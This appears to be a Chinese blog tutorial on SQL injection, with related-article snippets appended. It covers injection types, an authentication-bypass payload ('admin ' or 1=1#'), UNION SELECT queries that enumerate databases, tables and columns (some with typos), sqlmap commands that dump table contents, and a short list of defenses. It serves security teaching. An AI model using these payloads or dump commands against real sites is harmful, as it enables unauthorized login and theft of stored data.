WEB漏洞之SQL注入

最新推荐文章于 2024-05-14 17:13:08 发布
最新推荐文章于 2024-05-14 17:13:08 发布
阅读量453 收藏
点赞数
分类专栏: 安全 文章标签: SQL注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/wj193165zl/article/details/96461199
版权

SQL注入的简单例子:

使用URL:http://localhost/a.php?id=1'

在程序中,会执行下面的语句:

$id=$_GET['id'];

$sql="SELECT * FROM user WHERE id=$id' LIMIT 0,1"

执行上面的这条语句就会报错,这里如果不对URL进行判断,那么这就会导致语句的执行错误,严重的,别人就可以获取到想要的数据信息。

如何去发现SQL注入:

  1. 通过web漏洞扫描器发现
  2. 在参数后面添加错误语句
  3. 大量的对参数Fuzz测试

注入的分类

  1. 数字型注入:SELECT * FROM users WHERE id=$id LIMIT 0,1;
  2. 字符型注入:SELECT * FROM users WHERE username='admin' LIMIT 0,1;
  3. 注入提交的方式:GET,POST ,COOKIE,HTTP头部注入

注入方式

  1. 基于报错注入:注入错误,通过报错获取信息。
  2. 基于布尔的盲注
  3. 基于时间的盲注
  4. 联合查询
  5. 内联查询
  6. 堆叠的查询

常用的方式是前四种。

SQL手工注入

万能密码:PHP项目下,通过注入以下形式的sql,就能直接登陆到后台网站,而不需要密码:

admin ' or 1=1#

结合下面的SQL登陆判断

select * from user where username='$user' and passwd='$pass';

通过提交上面的字符,程序执行就会像下面这样:

select * from user where username ='admin' or 1=1 #' and password='pass';   //这样,#号后面的语句就会被注释掉,这样就绕过了程序对用户的判断。而直接以admin用户登陆

SQL注入的流程

  1. 猜解字段
  2. 查看当前数据库   ——>  猜解数据库中的表——>猜解数据库中有哪些字段
  3. Union select 1,group_concat(schema_name),3 from information_scheema.schemate%23    //查询所有数据库
  4. union select 1,group_concat(table_name),3 from information from information_schema.tables where  table_schema=0x736563757269749%23 //查询数据库中的表

UNION SELECT 1,GROUP_CONCAT(column_name),3 FROM information_schema.columns where table_name=0x736563757269749%23     //查看当前数据库中有哪些字段。

sqlmap工具的学习

官网:http://sqlmap.org/,我们可以使用扫描器,扫描出已有的SQL注入漏洞,然后再使用该工具进行测试该漏洞。

该工具用于测试业务是否有sql注入的漏洞。

使用方法:

python sqlmap.py -u "http://your url"  -v 3

-v 3表示的是sql注入的级别。为1~6,数字越大,代表了注入的时候,显示的信息越详细。

python sqlmap.py -u "http://your url"  -v 3 --current-db    //用于查看当前数据库的名称

python sqlmap.py -u "http://your url"  -v 3 --current-users   //当前数据库使用的用户和权限

python sqlmap.py -u "http://your url"  -v 3 --tables -D 数据库名   //查看当前数据库中有哪些表

python sqlmap.py -u "http://your url"  -v 3 --column -T 表名  -D 数据库名    //查看指定表下有哪些字段

python sqlmap.py -u "http://your url"  -v 3 --dump   -T 表名 -D 数据库名   //查看该表下有哪些数据。

上面的方式为GET注入的方式,下面记录以POST的方式,借助sqlmap进行注入:

借助于burpsuite,进行抓包,将抓取到的东西,保存至文档中1.txt,使用sqlmap分析该文档

python sqlmap.py -r 1.txt -v3

这样就可以对该网站进行post注入测试了。

如何防护SQL注入呢:

  1. CDN隐藏真是IP地址
  2. 通过安全函数进行过滤
  3. 对数据库最小权限设置,就算注入获取到该网站的数据库,其它的数据库也会很安全。
  4. 服务器针对性的WAF防火墙。
web漏洞SQL注入
Bin的博客
04-02 764
目录 一、概述 1.1什么是SQL注入 1.2原理 二、分类 2.1按照数据提交方式分类 2.2按照注入点类型来分类 2.3按照执行效果来分类 三、注入流程 四、验证方法 3.1数字型注入验证 3.2字符型注入验证 五、攻击方法 5.1猜解SQL查询语句中的字段数 5.2找回显点 5.3获取数据库名称 5.4查询表名 5.5查询字段 5.6查信息 六、防御方法...
网络安全基础技术扫盲篇 — 常见web漏洞SQL注入_websocket 安全漏洞sql注入
2401_84281655的博客
05-04 1158
这样,构成的SQL查询语句将变为:SELECT * FROM users WHERE username = ‘’ OR ‘1’=‘1’ AND password = ‘输入的密码’;由于 ‘1’=‘1’ 这个条件始终成立,攻击者可以绕过密码验证部分,成功登录到系统,即使他们没有正确的用户名和密码组合。这是一个典型的SQL注入漏洞的例子,攻击者通过在输入中注入恶意的SQL代码改变了查询语句的逻辑结构,绕过了用户名和密码的验证。
webgote的例子(5)Sql注入(Blog)
时光凉春衫薄的博客
03-25 435
    SQL Injection - Stored (Blog) (本章内容):留言板的注入 看到这个页面先看以下这个页面是做什么的。进行正常的写入发现我每写一句话,其内容都会写到下面的entry里面 在尝试一个不正常的输入 下面显示error了 表明不正常 我们细看一下报错的内容应该是’zet’)’的附近有错误。 我们的注入点是找到了但是还不知道是怎么上传上去的,抓个包看看 ...
webgote的例子(6)SQL注入(盲注)
时光凉春衫薄的博客
04-15 341

   SQL Injection - Blind (WS/SOAP) 本期演示的是盲注的手法。有些网站在与数据库交互的地方进行了很好的修饰,将报错的语句进行修改,即使你找到了注入点也无法下手拿数据,这个时候我们的步骤就比较麻烦了,我们只能通过对错的方式进行盲注(如下演示) 首先我们看一眼这是一个正常的显示页面。 加了一个点后也有不一样的地方。。。。。。。。 电影...
Web安全漏洞——sql注入
weixin_42095265的博客
11-18 451
1.原理 注入攻击的本质,是把用户输入的数据当成代码执行。两个关键条件:一是用户能够控制输入;二是原本程序要执行的代码,拼接了用户输入的数据。当攻击者发送的sql语句被sql解释器执行,通过执行这些恶意语句欺骗数据库执行,导致数据库信息泄露。 2.分类 按注入点的参数类型:数字型、字符型 当注入点的参数为整数时,如id、num、page等,这种形式为数字型注入漏洞注入点的参数为字符串时,则为...
Web 安全漏洞SQL 注入
weixin_34363171的博客
10-29 459
什么是 SQL 注入 “有人的地方就有江湖,有数据库存在的地方就可能存在 SQL 注入漏洞。” 在所有漏洞类型中,SQL 注入可是说是危害最大最受大家关注的漏洞。简单说来,SQL 注入是通过在用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻击行为。还是以 ThinkJS 为例,假设我们写了如下一个接口(实际情况肯定不会这么写的): // user.js modul...
网络安全基础技术扫盲篇 — 常见web漏洞SQL注入_websocket 安全漏洞sql注入(1)
2301_82243523的博客
05-14 776
本人从事网路安全工作12年,曾在2个大厂工作过,安全服务、售后服务、售前、攻防比赛、安全讲师、销售经理等职位都做过,对这个行业了解比较全面。最近遍览了各种网络安全类的文章,内容参差不齐,其中不伐有大佬倾力教学,也有各种不良机构浑水摸鱼,在收到几条私信,发现大家对一套完整的系统的网络安全从学习路线到学习资料,甚至是工具有着不小的需求。最后,我将这部分内容融会贯通成了一套282G的网络安全资料包,所有类目条理清晰,知识点层层递进,需要的小伙伴可以点击下方小卡片领取哦!
网络安全基础技术扫盲篇 — 常见web漏洞SQL注入_websocket 安全漏洞sql注入(2)
2401_84545468的博客
05-14 650
在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
第14天:WEB漏洞-SQL注入之类型及提交注入1
08-03
在网络安全领域,SQL注入是一种常见的Web漏洞,攻击者通过向应用程序的输入字段中插入恶意的SQL代码,以篡改或获取数据库中的敏感信息。本文将详细介绍SQL注入的类型及其提交方式,以及如何进行安全测试。 首先,...
Web安全漏洞SQL注入
weixin_43679134的博客
12-02 266
SQL注入是将sql语句输入到用户输入的参数中,之后再将这些参数传递到后 台的SQL服务器加以解析并执行。 原理:通过用户可控参数中注入SQL语法,破环原有SQL结构,达到编写程序意料之外的结果。 危害:1.获取信息 2.拖库 3.修改数据库 4.拿到webshell 5.服务器系统权限 过程:表示层访问具体网址http://www.xxx.com 逻辑层加载、编译并执行脚本文件...
web安全之sql注入
weixin_30527143的博客
08-19 79
0、实际案例: 使用sqlmap工具对注入点进行SQL测试: 1、sqlmap.py -u "url" --dbs 获取数据库 2、sqlmap.py -u "url" -D 数据库名称 --tables 获取表名 3、sqlmap.py -u "url" -D 数据库名称 -T 表名 --columns 获取字段 4、sqlmap.py -u "url" -D 数据库名称 -T 表名 ...
网络安全基础技术扫盲篇 — 常见web漏洞SQL注入
资深程序员,曾自学JAVA,C#,如今从业于网安行业
02-01 659
如果你也想学习:黑客&网络安全的SQL攻防知识宝库在此藏,一键关注获宝藏是一种Web应用程序中的安全漏洞,它允许攻击者通过在用户输入中插入恶意的SQL代码,来执行非授权的数据库操作。具体来说,当应用程序将用户输入的数据直接拼接到SQL查询语句中而没有充分验证或转义时,攻击者可以利用这个漏洞来修改原本的查询意图,甚至获取、修改或删除数据库中的数据。SQL注入攻击的原理是用户输入的数据被当成SQL代码执行。
web安全-理论+实战SQL注入漏洞
Coisini的博客
05-31 650
理论+实战SQL注入漏洞 (1433是Mssql端口) 基本语句: Select*from 表名 查询表内所有内容 CREATE DATABASE database-name 创建数据库 drop database dbname 删除数据库 调用代码 <% set conn =server.createobject(” adodb.connection”) conn.open...
sqli-liabs学习SQL注入之旅(第一关~第十关)
guanjian_ci的博客
04-20 4136
第一关 第一步:判断参数的类型 ?id=1' 页面报错 ?id=1' --+ 页面正常 判断参数接受类型为 字符型 查看第一关源码:$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; 证明我们的判断正确! 第二步:猜解字段 ?id=1' order by 3 --+ 页面正常 ?id=1' order by 4 --+ 页面报错 判断字段长度为 3 第三步:爆数据库名 ?id=-
SQL注入部分
农夫果园好好喝的博客
06-13 188
1.SQL注入介绍 SQL注入就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数代入数据库查询,攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作 以php语句为例: $query =select * from users where id = $_GET[id]; 2.SQL注入原理 SQL注入漏洞的产生需要满足一下两个条件。 1.参数用户可控:前端传给后端的参数内容是用户可以控制的 2.参数代入数据库查询:传入的参数拼接到SQL语句,并且带入数据库
MySQL查询优化:LIMIT 1避免全表扫描
移动编程
03-27 1206
在某些情况下,如果明知道查询结果只有一个,SQL语句中使用LIMIT 1会提高查询效率。 例如下面的用户表(主键id,邮箱,密码): create table t_user( id int primary key auto_increment, email varchar(255), password varchar(255) ); 每个用户的email是唯一的,如果用户使用em...
01_SQL注入_Mysql注入利用联合查询的手工注入
qq_42171569的博客
04-16 3951
01_SQL注入_Mysql注入:利用联合查询的手工注入 1.SQL注入的成因 【严正声明】仅供学习,勿做他用!!! 【严正声明】仅供学习,勿做他用!!! 【严正声明】仅供学习,勿做他用!!! 遵纪守法,做合格网民!!!! 开发过程中,一些开发者会直接将URL的参数,POST方法的参数等一些列外来输入的参数拼接到SQL语句中。上述做法会造成SQL语句的可控,从而使得测试者能够通过执行SQL语句,实现一些自定义操作。 $id=$_GET['id']; $fp=fopen('result.txt','a');
小迪 WEB漏洞-SQL注入之简要SQL注入
最新发布
02-11
### SQL注入漏洞简介 SQL注入漏洞允许攻击者通过应用程序向数据库发送恶意的SQL命令,这些命令可能用于读取、修改甚至删除数据[^1]。 #### 防范措施概述 针对这种威胁,推荐采用多种防护手段相结合的方式。例如,使用参数化查询能够有效防止非法指令嵌入;对所有外部输入实施严格的验证与清理也是不可或缺的一环;另外还需设定合理的字符数上限并指定预期的数据格式;最后要避免泄露过多的技术细节给潜在入侵者。 ### 基础利用方式 对于存在缺陷的应用程序而言,如果未能妥善处理来自用户的输入,则可能会成为SQL注入的目标。假设有一个登录页面接受用户名和密码作为输入,并直接将其拼接到SQL查询字符串中而不做任何预处理: ```sql SELECT * FROM users WHERE username='input_username' AND password='input_password'; ``` 此时,假如`input_username`被设置为`admin' -- `而`input_password`为空串的话,那么最终形成的SQL语句将会变成这样: ```sql SELECT * FROM users WHERE username='admin' -- ' AND password=''; ``` 这里的双连字符(`--`)标志着后续内容应被视为注释而非实际逻辑的一部分,因此无论原始密码是什么,只要提供了特定形式的用户名就能绕过认证机制成功登陆管理员账户[^5]。 然而值得注意的是,在现代开发实践中,上述情景已经很少见到了,因为大多数框架都内置了有效的防御机制来抵御此类攻击。开发者应当始终遵循最佳实践指南构建安全可靠的软件产品。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值